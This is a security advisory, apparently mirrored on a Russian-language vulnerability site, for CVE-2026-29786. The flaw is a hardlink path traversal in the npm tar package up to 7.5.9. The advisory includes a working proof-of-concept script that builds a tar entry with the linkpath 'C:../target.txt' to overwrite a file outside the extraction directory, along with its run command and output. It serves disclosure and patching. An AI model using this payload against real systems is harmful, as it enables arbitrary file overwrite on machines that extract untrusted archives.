GHSA-qffp-2rhf-9h96

Опубликовано: 05 мар. 2026

Источник: github

Github: Прошло ревью

CVSS4: 8.2

Описание

tar has Hardlink Path Traversal via Drive-Relative Linkpath

Summary

tar (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction.

Details

The extraction logic in Unpack[STRIPABSOLUTEPATH] checks for .. segments before stripping absolute roots.

What happens with linkpath: "C:../target.txt":

Split on / gives ['C:..', 'target.txt'], so parts.includes('..') is false.
stripAbsolutePath() removes C: and rewrites the value to ../target.txt.
Hardlink creation resolves this against extraction cwd and escapes one directory up.
Writing through the extracted hardlink overwrites the outside file.

This is reachable in standard usage (tar.x({ cwd, file })) when extracting attacker-controlled tar archives.

PoC

Tested on Arch Linux with tar@7.5.9.

PoC script (poc.cjs):

const fs = require('fs') const path = require('path') const { Header, x } = require('tar') const cwd = process.cwd() const target = path.resolve(cwd, '..', 'target.txt') const tarFile = path.join(process.cwd(), 'poc.tar') fs.writeFileSync(target, 'ORIGINAL\n') const b = Buffer.alloc(1536) new Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0) fs.writeFileSync(tarFile, b) x({ cwd, file: tarFile }).then(() => { fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\n') process.stdout.write(fs.readFileSync(target, 'utf8')) })

Run:

cd test-workspace node poc.cjs && ls -l ../target.txt

Observed output:

PWNED -rw-r--r-- 2 joshuavr joshuavr 6 Mar 4 19:25 ../target.txt

PWNED confirms outside file content overwrite. Link count 2 confirms the extracted file and ../target.txt are hardlinked.

Impact

This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.

Realistic scenarios:

CLI tools unpacking untrusted tarballs into a working directory
build/update pipelines consuming third-party archives
services that import user-supplied tar files

Ссылки

Пакеты

Наименование

tar

npm

Затронутые версииВерсия исправления

<= 7.5.9

7.5.10

EPSS

Процентиль: 0%

0.00005

Низкий

8.2 High

CVSS4

CVE ID

CVE-2026-29786

Дефекты

CWE-22

CWE-59

Связанные уязвимости

CVE-2026-29786

CVSS3: 6.3

ubuntu

19 дней назад

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.